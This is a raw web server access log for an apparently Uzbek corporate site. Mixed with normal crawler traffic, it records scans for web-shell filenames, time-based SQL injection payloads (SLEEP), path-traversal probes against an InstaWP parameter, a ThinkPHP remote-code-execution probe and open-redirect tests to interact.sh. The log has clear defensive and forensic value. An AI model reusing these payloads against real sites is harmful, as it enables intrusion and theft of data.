52.167.144.188 - - [24/Aug/2026:22:08:20 +0500] "GET /?gclid=1790895282&start=30 HTTP/1.1" 200 63350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
184.73.68.20 - - [24/Aug/2026:22:08:31 +0500] "GET /?mobile_co=1&start=24 HTTP/1.1" 200 62892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:08:52 +0500] "GET /?p=516&start=6 HTTP/1.1" 200 63073 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:22:10:31 +0500] "GET /uz/component/search/?Itemid=17027&catid=6180&format=opensearch&id=9475 HTTP/1.1" 200 721 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.14 - - [24/Aug/2026:22:10:45 +0500] "GET /uz/stockholders-uzb/polls-uzb/9505-protokol-str-24-08-2016 HTTP/1.1" 200 32709 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
137.131.22.172 - - [24/Aug/2026:22:12:21 +0500] "GET /uz/stockholders-uzb/polls-uzb/2-uncategorised/9728-ensuring-openness-uz?layout=edit HTTP/1.1" 508 288 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
4.204.200.136 - - [24/Aug/2026:22:13:24 +0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:13:31 +0500] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:13:37 +0500] "GET /images.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:13:43 +0500] "GET /222.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:13:48 +0500] "GET /ops.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:13:55 +0500] "GET /4PJcpMFsD8B.php HTTP/1.1" 404 1239 "-" "-"
185.191.171.18 - - [24/Aug/2026:22:13:53 +0500] "GET /uz/officially-uzb/tender-uzb?template=oloy HTTP/1.1" 200 41374 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
4.204.200.136 - - [24/Aug/2026:22:14:02 +0500] "GET /3PJcpMFsD8B.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:10 +0500] "GET /new.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:17 +0500] "GET /confag.php HTTP/1.1" 508 288 "-" "-"
34.123.149.87 - - [24/Aug/2026:22:14:09 +0500] "GET /uz/stockholders-uzb/audit-uzb/6193-fixed-assets/9873-reestr-xarid-3-2024-xlsx HTTP/1.1" 200 32402 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.204.200.136 - - [24/Aug/2026:22:14:17 +0500] "GET /9b97ec/index.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:26 +0500] "GET /b9007d/index.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:34 +0500] "GET /aaa.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:34 +0500] "GET /000.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:34 +0500] "GET /11.php?p= HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:34 +0500] "GET /about.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:42 +0500] "GET /admin.php/admin.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:47 +0500] "GET /media.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:53 +0500] "GET /admin.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:14:57 +0500] "GET /mac.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:02 +0500] "GET /1.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:05 +0500] "GET /coffee.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:11 +0500] "GET /classwithtostring.php?p= HTTP/1.1" 404 1239 "-" "-"
34.56.53.225 - - [24/Aug/2026:22:15:12 +0500] "GET /component/search/?Itemid=17006&catid=6176&format=opensearch&id=9634 HTTP/1.1" 200 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.204.200.136 - - [24/Aug/2026:22:15:18 +0500] "GET /wp-ws68.php?p= HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:26 +0500] "GET /yj09.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:34 +0500] "GET /scxy.php HTTP/1.1" 404 1239 "-" "-"
34.10.180.98 - - [24/Aug/2026:22:15:49 +0500] "GET /uz/?format=feed&type=rss&wptouch_switch=desktop HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.204.200.136 - - [24/Aug/2026:22:15:43 +0500] "GET /blurbs.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:50 +0500] "GET /bajah.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:15:57 +0500] "GET /domvf.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:05 +0500] "GET /fpwch.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:13 +0500] "GET /adminner.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:20 +0500] "GET //abcd.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:21 +0500] "GET /simple.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:21 +0500] "GET /wp-load.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:21 +0500] "GET /155.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:21 +0500] "GET /aaa.php?p= HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:21 +0500] "GET /FWAZ.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:22 +0500] "GET /ccc.php?p= HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:22 +0500] "GET /admin.php?p= HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:22 +0500] "GET /reviall.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:30 +0500] "GET /hp2.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:37 +0500] "GET //doc.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:44 +0500] "GET /too.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:16:52 +0500] "GET /kir.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:00 +0500] "GET //wp-includes/Requests/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:05 +0500] "GET /wp-admin/css/colors/modern/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:10 +0500] "GET //wp-includes/assets/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:13 +0500] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:18 +0500] "GET //wp-includes/l10n/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:24 +0500] "GET /wp-content/uploads/ HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:25 +0500] "GET //cgi-bin/index.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:25 +0500] "GET //wp-includes/css/dist/ HTTP/1.1" 404 1239 "-" "-"
103.78.255.129 - - [24/Aug/2026:22:17:35 +0500] "GET /wp-login.php HTTP/1.1" 508 288 "-" "Mozilla/5.0"
34.42.229.145 - - [24/Aug/2026:22:17:23 +0500] "GET /uz/stockholders-uzb/affil-uzb/9524-affil-09-08-2019-uz HTTP/1.1" 200 33033 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.78.255.129 - - [24/Aug/2026:22:17:38 +0500] "GET /wp-login.php HTTP/1.1" 508 288 "-" "Mozilla/5.0"
4.204.200.136 - - [24/Aug/2026:22:17:32 +0500] "GET //wp-includes/js/jquery/ HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:39 +0500] "GET //wp-content/admin.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:40 +0500] "GET /wp-content/themes/index.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:40 +0500] "GET /wp-includes/blocks/details/ HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:40 +0500] "GET /.well-known/about.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:40 +0500] "GET /wp-includes/ID3/about.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:40 +0500] "GET /wp-includes/Text/ HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:41 +0500] "GET /ts.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:41 +0500] "GET /bak.php HTTP/1.1" 508 288 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:41 +0500] "GET /olik.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:49 +0500] "GET /about.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:54 +0500] "GET /19.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:17:59 +0500] "GET /3cf97/index.php HTTP/1.1" 404 1239 "-" "-"
4.204.200.136 - - [24/Aug/2026:22:18:05 +0500] "GET /12.php HTTP/1.1" 404 1239 "-" "-"
47.128.116.49 - - [24/Aug/2026:22:18:06 +0500] "GET /uz/?controller=CommentGrade&fc=module&id_products%5B0%5D=1%20AND%20%28SELECT%203875%20FROM%20%28SELECT%28SLEEP%288%29%29%29xoOt%29&module=productcomments&start=78 HTTP/1.1" 200 55969 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://bytedance.sg.larkoffice.com/docx/K5bxdypulop3IIxrJb0lOjLVgFe)"
4.204.200.136 - - [24/Aug/2026:22:18:12 +0500] "GET /term.php HTTP/1.1" 404 1239 "-" "-"
52.167.144.160 - - [24/Aug/2026:22:18:54 +0500] "GET /?cats=1&start=72 HTTP/1.1" 200 56686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
85.208.96.202 - - [24/Aug/2026:22:19:03 +0500] "GET /uz/?instawp-database-manager=%2F..%2F..%2F..%2F.%2Fmigrate%2Ftemplates%2Fdebug%2Fdb-table&start=60 HTTP/1.1" 200 63204 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:22:19:25 +0500] "GET /?p=516&start=12 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
96.125.144.118 - - [24/Aug/2026:22:21:21 +0500] "GET /images/links/infor-1-ru.png HTTP/1.1" 200 5485 "http://uzbekgidroenergoqurilish.uz/stockholders-rus/corporate-governance-rus" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
18.205.213.231 - - [24/Aug/2026:22:21:11 +0500] "GET /about-org-rus/news-rus HTTP/1.1" 200 40476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:22:21:46 +0500] "GET /?function=call_user_func_array&start=36 HTTP/1.1" 200 62318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:22:35 +0500] "GET /uz/?format=feed&redirect=https://interact.sh/&type=rss HTTP/1.1" 200 8132 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.30.223.149 - - [24/Aug/2026:22:22:44 +0500] "GET /docs/2023/vakansii-2022.doc HTTP/1.1" 200 62464 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:22:54 +0500] "GET /uz/component/search/?Itemid=17022&catid=6193&format=opensearch&id=9873 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:24:11 +0500] "GET /uz/about-org-uzb/news-uzb?start=6&template=oloy HTTP/1.1" 200 40324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.11 - - [24/Aug/2026:22:24:44 +0500] "GET /uz/?author=20 HTTP/1.1" 200 62035 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:22:24:49 +0500] "GET /en/component/search/?Itemid=17210&catid=6181&format=opensearch&id=9481 HTTP/1.1" 200 728 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.200 - - [24/Aug/2026:22:25:00 +0500] "GET /?start=6&wordpress_x_core=check HTTP/1.1" 200 62639 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [24/Aug/2026:22:25:23 +0500] "GET /uz/?a=register&c=user&m=default&start=60&u=0 HTTP/1.1" 200 63228 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
35.254.159.230 - - [24/Aug/2026:22:26:29 +0500] "GET /en/component/search/?Itemid=17228&format=opensearch&template=oloy HTTP/1.1" 200 719 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:27:42 +0500] "GET /uz/about-org-uzb/news-uzb/6193-fixed-assets/9722-dog-08-2022-xlsx HTTP/1.1" 200 31636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
157.55.39.195 - - [24/Aug/2026:22:27:43 +0500] "GET /uz/?function=call_user_func_array&s=/Index/%20hink%20pp/invokefunction&vars[0]=md5&vars[1][0]=HelloThinkPHP21&start=36 HTTP/1.1" 200 62058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
43.157.43.147 - - [24/Aug/2026:22:28:30 +0500] "GET /2-uncategorised/9718-anti-corruption HTTP/1.1" 200 55540 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.123.149.87 - - [24/Aug/2026:22:29:00 +0500] "GET /uz/?redirect=https://interact.sh/&start=6 HTTP/1.1" 200 61337 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.193 - - [24/Aug/2026:22:29:24 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/6193-fixed-assets/9860-reestr-xarid-12-2023-xlsx HTTP/1.1" 200 32384 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:22:29:37 +0500] "GET /uz/component/mijopolls/?template=oloy HTTP/1.1" 200 35410 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:22:29:42 +0500] "GET /uz/?format=feed&tp=1&type=atom HTTP/1.1" 200 12806 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:30:17 +0500] "GET /uz/officially-uzb/procurement-uzb/6193-fixed-assets?format=feed&type=atom HTTP/1.1" 200 11495 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:31:19 +0500] "GET /?controller=CommentGrade&fc=module&id_products%5B0%5D=1+AND+(SELECT+3875+FROM+(SELECT(SLEEP(8)))xoOt)&module=productcomments&start=12 HTTP/1.1" 200 63021 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.14 - - [24/Aug/2026:22:31:25 +0500] "GET /uz/?author=1&start=30 HTTP/1.1" 200 60704 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [24/Aug/2026:22:31:51 +0500] "GET /?start=6&wordpress_x_core=check HTTP/1.1" 200 62571 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.169.16.7 - - [24/Aug/2026:22:32:03 +0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:05 +0500] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:07 +0500] "GET /Capte.php HTTP/1.1" 404 1234 "-" "-"
34.10.180.98 - - [24/Aug/2026:22:32:08 +0500] "GET /en/stockholders-eng/audit-eng/9486-audit-2014 HTTP/1.1" 200 29793 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.169.16.7 - - [24/Aug/2026:22:32:11 +0500] "GET /beetle.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:14 +0500] "GET /fin.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:15 +0500] "GET /kurtlar.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:16 +0500] "GET /m.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:17 +0500] "GET /anon.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:18 +0500] "GET /cmd.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:19 +0500] "GET /4rbvp7.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:20 +0500] "GET /0freg0a6xe.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:21 +0500] "GET /6zl637u8kl.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:22 +0500] "GET /ftde.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:24 +0500] "GET //special.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:27 +0500] "GET /fz.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:29 +0500] "GET /v2.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:33 +0500] "GET /cnsk.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:35 +0500] "GET /sc.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:36 +0500] "GET /xstelth.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:37 +0500] "GET /themes.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:38 +0500] "GET /coffe.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:39 +0500] "GET /ans.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:40 +0500] "GET /cns.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:42 +0500] "GET /like.php HTTP/1.1" 404 1234 "-" "-"
20.169.16.7 - - [24/Aug/2026:22:32:43 +0500] "GET /xiugai.php HTTP/1.1" 404 1234 "-" "-"
34.123.149.87 - - [24/Aug/2026:22:33:27 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/2-uncategorised?format=feed&type=rss HTTP/1.1" 200 18835 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:33:35 +0500] "GET /uz/component/search/?Itemid=17249&catid=6193&format=opensearch&id=9817 HTTP/1.1" 200 721 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
47.128.119.196 - - [24/Aug/2026:22:33:42 +0500] "GET /uz/?cats=1%2Asleep%285%29&start=72 HTTP/1.1" 200 63514 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; ttspider-feedback@tiktok.com)"
34.171.68.95 - - [24/Aug/2026:22:33:43 +0500] "GET /uz/?start=18&yandex-source=touch-maps HTTP/1.1" 200 60827 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:34:40 +0500] "GET /uz/?start=48&template=accessibility' HTTP/1.1" 200 32845 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:34:46 +0500] "GET /uz/?instawp-database-manager=/../../.././migrate/templates/debug/db-table&start=36&table_name=wp_users--+- HTTP/1.1" 200 62058 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
161.153.108.197 - - [24/Aug/2026:22:34:58 +0500] "GET /stockholders-rus/comissions-rus HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
161.153.108.197 - - [24/Aug/2026:22:35:01 +0500] "GET /stockholders-rus/comissions-rus HTTP/1.1" 200 41650 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.191.171.13 - - [24/Aug/2026:22:35:29 +0500] "GET /uz/?mobile_co=1&start=36 HTTP/1.1" 200 61517 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.171.68.95 - - [24/Aug/2026:22:36:03 +0500] "GET /uz/component/search/?Itemid=17023&catid=6178&format=opensearch&id=9869 HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.12 - - [24/Aug/2026:22:36:09 +0500] "GET /?instawp-database-manager=%2F..%2F..%2F..%2F.%2Fmigrate%2Ftemplates%2Fdebug%2Fdb-table&start=36&table_name=wp_users--%20- HTTP/1.1" 200 63525 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.196 - - [24/Aug/2026:22:36:17 +0500] "GET /uz/?__kds_flag=post&start=24 HTTP/1.1" 200 63606 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.5.176.194 - - [24/Aug/2026:22:36:48 +0500] "GET / HTTP/1.1" 200 63195 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:36:59 +0500] "GET /uz/?start=54&wptouch_switch=desktop HTTP/1.1" 200 63436 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
40.77.167.18 - - [24/Aug/2026:22:38:03 +0500] "GET /uz/?0=1&start=12 HTTP/1.1" 200 62031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:38:13 +0500] "GET /uz/stockholders-uzb/polls-uzb/6193-fixed-assets/9817-dog-xarid-05-2023-xlsx HTTP/1.1" 200 32259 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:22:38:18 +0500] "GET /?module=users/login&start=48 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:38:22 +0500] "GET /en/component/search/?Itemid=17211&catid=6187&format=opensearch&id=9525 HTTP/1.1" 200 728 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:40:57 +0500] "GET /uz/?p=269&start=36 HTTP/1.1" 200 61804 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:22:41:04 +0500] "GET /stockholders-rus/affil-rus/9523-affil-09-08-2019-ru HTTP/1.1" 200 33312 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
